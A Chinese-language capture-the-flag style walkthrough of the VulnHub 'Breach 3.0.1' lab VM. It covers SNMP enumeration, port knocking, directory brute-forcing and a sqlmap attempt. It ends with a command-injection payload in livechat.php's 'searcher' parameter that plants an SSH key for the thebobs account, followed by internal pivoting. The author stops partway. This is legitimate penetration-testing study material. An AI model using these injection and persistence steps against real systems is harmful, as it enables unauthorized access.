本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切后果與發表本文章的作者無關
靶機下載之后使用僅主機模式加載到本地VMware Workstation工作站,需要發現目標靶機的IP地址,可以使用nmap,netdiscover,或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的,那么本次演示就是arp-scan工具發現
地址:https://www.vulnhub.com/entry/breach-301,177/
剛開始使用nmap進行掃描沒有結果,默認我都是掃描tcp的,什么都沒有掃描出來
於是再重新掃描下udp端口,發現開放了161的udp端口,使用下面命令進行測試
snmpwalk -Os -c public -v 1 192.168.56.104
根據網上信息的提示,確認目標靶機開了knock ,需要敲擊的端口是根據這個信息 獲取 iso.3.6.1.2.1.1.4.0 = STRING: "Email: Milton@breach.local - (545)-232-1876"
端口分別為545 232 1876
使用 knock -v 192.168.56.104 545 232 1876 多敲擊幾次看看,再次使用nmap掃描,發現開放了8端口
訪問是個401認證的web界面
這里有一個疑問,一個是需要再次敲擊 knock -v 192.168.56.104 555 423 1800 就會開放22端口
這里給出的賬號和密碼是milton/thelaststraw 得到的密碼信息是根據這個靶機系列的第一個靶機"Breach 1"信息獲得的,登錄成之后顯示如下信息:
看到有一個連接place 點進去看看
發現是個登錄界面 http://192.168.56.104:8/breach3/index.php ,試了下弱口令無果,那么嘗試下目標猜解,在猜解之前因為是帶401認證的,所以我們先使用burp抓包把401認證的base64編碼信息拿過來
需要猜解得目錄是 http://192.168.56.104:8/breach3/
dirb http://192.168.56.104:8/breach3/ -w -H "Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==" | tee dirb_192.168.56.104_breach3.txt
根據猜解得新獲得了目錄blog
右鍵查看當前頁面的源代碼,發現電子郵件
那么這個時候就知道目標靶機存在一個用戶名為samir,繼續使用dirb命令加載大字典進行猜解,同時增加猜解范圍
dirb http://192.168.56.104:8/breach3/ -w -H "Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==" /usr/share/wordlists/dirb/big.txt -X .php,.bak,.html,.txt| tee dirb_192.168.56.104_breach3_big.txt
沒看到太多有價值的信息,那么我們繼續回到剛獲得登錄窗口 http://192.168.56.104:8/breach3/index.php ,剛開始測試的思路就是試下弱口令不行,那么這次試試有沒有SQL注入
通過burp抓登錄請求包,然后使用sqlmap進行注入
sqlmap -r bmfx_breach3.txt --auth-type=Basic --auth-cred=milton:thelaststraw --proxy=http://192.168.56.1:8080 --tamper=equaltolike --level=5 --risk=3 --dbms=mysql --dbs
上面測試並未成功,但是經過https://mrh4sh.github.io/breach-3-solution 提示,確認存在一個代碼執行的漏洞,那么可以直接寫入一個ssh公鑰過去直接連接,事先將公鑰進行base64編碼
執行下面3步操作
http://192.168.56.104:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo "c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL2l6L04yVmN5UUpHblBoTjhjRWZtVkZEdC9JTVRLajhHV2JFQVlBaGV4K2hBZE53RGYyMSs5dUNKWjRvaE5JeXpTK0syMTk2TVVlSW91aHBwd0tWZ0poSHVCc2QwZnV1QUF6bUtKbGlQZjUyQk9Gb0hZcmg2bUpxZm1mVk1oZzVQUUhXTWV4cldia2krUTRwREhKM1VpaWtwenhxWkFFZHJZUlZnOGZaYUtFY2ZoMG50aXdja0NKbWFLV1c2Y2hQWGRiOTdLYnE0bVlnZzRwamxjeGtJQ3VYTWRtSnh1TW9mRUdaTW0wUEhWSU1rb2hKRzl3NjJCZlY1d2M0MStyZ0E2TWczYnRHM1BPcDcyNUxPbmduQ0JlV3VUaE1CZ0o2ZlVNZER2cldaSEdQd3ovSjE0MUM2OGFpS2Zsa2M3NXA3QWwvMHUxVERtSitvdG5Fc3pDYlF4cTFVakhlVVhOaTZKSGFZdzdEQ2h2MVhwM05vY0EwK1FpTWhpdDdoYzNoS24zMjh3L1BtR09SclhuaG9EMHRETi9VSXFmNmNMOS9lOWlJcEQyNDdML2dvNlVqWlVybURKVDFJZjRXajVUa09UVU9tZWJVc1JQS2paZWRIc3BaSkFLK2JaYnppdW11dUNzMGpwUHNRRk56N1hDWHZFc2Nra0I3RktRdTZCTGM9IGthbGlAa2FsaQ==" | base64 -d > /home/thebobs/.ssh/authorized_keys
http://192.168.56.104:8/breach3/thebobscloudhostingllc/livechat.php?searcher=sudo%20-u%20thebobs%20chmod%20700%20/home/thebobs/.ssh/
http://192.168.56.104:8/breach3/thebobscloudhostingllc/livechat.php?searcher=sudo%20-u%20thebobs%20chmod%20600%20/home/thebobs/.ssh/authorized_keys
確保文件寫入成功,保證.ssh目錄權限是700,里面的文件authorized_keys權限是600即可遠程連接,開始連接
發現連接成功是直接進入Python環境,那么我們通過Python環境生成一個shell
使用ifconfig命令看看IP網絡信息
然后發現存在虛擬機,網段是122的,那么使用for循環掃描看看
for i in $(seq 2 254); do ping -c 1 192.168.122.$i -W 1| grep "bytes from "; done
確認存活兩台主機,IP地址分別為192.168.122.28和192.168.122.65 ,想對這兩台虛擬機進行掃描,試試目標靶機是否存在namp命令,直接指向一下發現是存在的,那么我們直接使用nmap命令進行掃描
最終的掃描結果如下:
確認目標192.168.122.65開放了22,80,8800端口,根據掃描結果發現,開放的8800端口有401認證,80端口顯示是Apache,那么可以確認這又是個web應用,那么我們需要對其進行測試,但是因為這是目標靶機里面的虛擬機,為了訪問方便,我使用ssh進行進行端口轉發。
先把里面的80端口轉發出來
ssh -L 8080:192.168.122.65:80 thebobs@192.168.56.104
執行了上面的端口轉發,發現沒效果,而且通過root權限,進入查看監聽端口也沒有開啟。這個靶機先放着吧,感覺靶機本身問題比較多,前面剛開始的knock也是存在問題,不關咋knock8端口都不開放,還是通過單用戶模式進入到目標靶機停掉knock服務,然后執行防火牆腳本才起來的,大家有興趣看看這邊博客的演示:https://mrh4sh.github.io/breach-3-solution
